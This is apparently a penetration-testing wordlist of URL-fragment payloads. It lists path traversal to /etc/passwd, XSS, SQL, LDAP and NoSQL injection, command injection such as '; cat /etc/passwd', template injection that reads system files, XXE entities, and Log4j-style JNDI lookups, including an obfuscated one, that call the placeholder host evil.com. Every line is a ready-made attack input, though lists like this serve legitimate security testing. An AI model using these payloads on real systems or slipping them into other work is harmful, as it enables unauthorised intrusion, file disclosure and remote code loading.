# Fragment-based penetration testing payloads
# These payloads are designed to test server-side fragment handling

# Administrative access attempts
#admin
#administrator
#debug
#config
#settings
#panel
#dashboard
#control

# Path traversal attempts
#../
#../../
#../../../
#../../../../etc/passwd
#../../../windows/system32/
#..%2f..%2f..%2fetc%2fpasswd
#%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# XSS payloads
#<script>alert('xss')</script>
#<img src=x onerror=alert('xss')>
#javascript:alert('fragment_xss')
#<svg onload=alert('xss')>
#"><script>alert('xss')</script>
#';alert('xss');//
#<iframe src=javascript:alert('xss')></iframe>

# SQL injection attempts
#' OR 1=1--
#' UNION SELECT * FROM users--
#'; DROP TABLE users; --
#' OR 'a'='a
#admin'--
#' OR 1=1#
#') OR 1=1--

# LDAP injection
#*)(uid=*))(|(uid=*
#*)(|(password=*))
#admin)(|(password=*

# Command injection
#; ls -la
#| whoami
#& dir
#`id`
#$(whoami)
#; cat /etc/passwd
#| type c:\windows\system32\drivers\etc\hosts

# JNDI injection (Log4j style)
#${jndi:ldap://evil.com/a}
#${jndi:rmi://evil.com/a}
#${jndi:dns://evil.com/a}
#${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com/a}

# Template injection
#{{7*7}}
#${7*7}
#<%= 7*7 %>
#{{config}}
#{{''.__class__.__mro__[2].__subclasses__()}}

# XXE attempts
#<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
#<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/xxe">]>

# SSTI (Server-Side Template Injection)
#{{7*'7'}}
#{{config.items()}}
#{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

# NoSQL injection
#' || 1==1//
#' || 1==1%00
#{"$gt":""}
#{"$ne":null}

# Information disclosure
#phpinfo
#info
#test
#backup
#tmp
#temp
#log
#logs
#error
#errors
#trace
#stack

# Encoded variants
#%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
#%27%20OR%201%3D1--
#%2e%2e%2f%2e%2e%2fetc%2fpasswd
#%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%78%73%73%27%29%3E

# Double encoding
#%253Cscript%253Ealert%2528%2527xss%2527%2529%253C%252Fscript%253E
#%2527%2520OR%25201%253D1--

# Unicode variants
#\u003cscript\u003ealert('xss')\u003c/script\u003e
#\u0027\u0020OR\u00201=1--

# Null byte injection
#%00
#admin%00
#config%00.txt
#../../../etc/passwd%00.jpg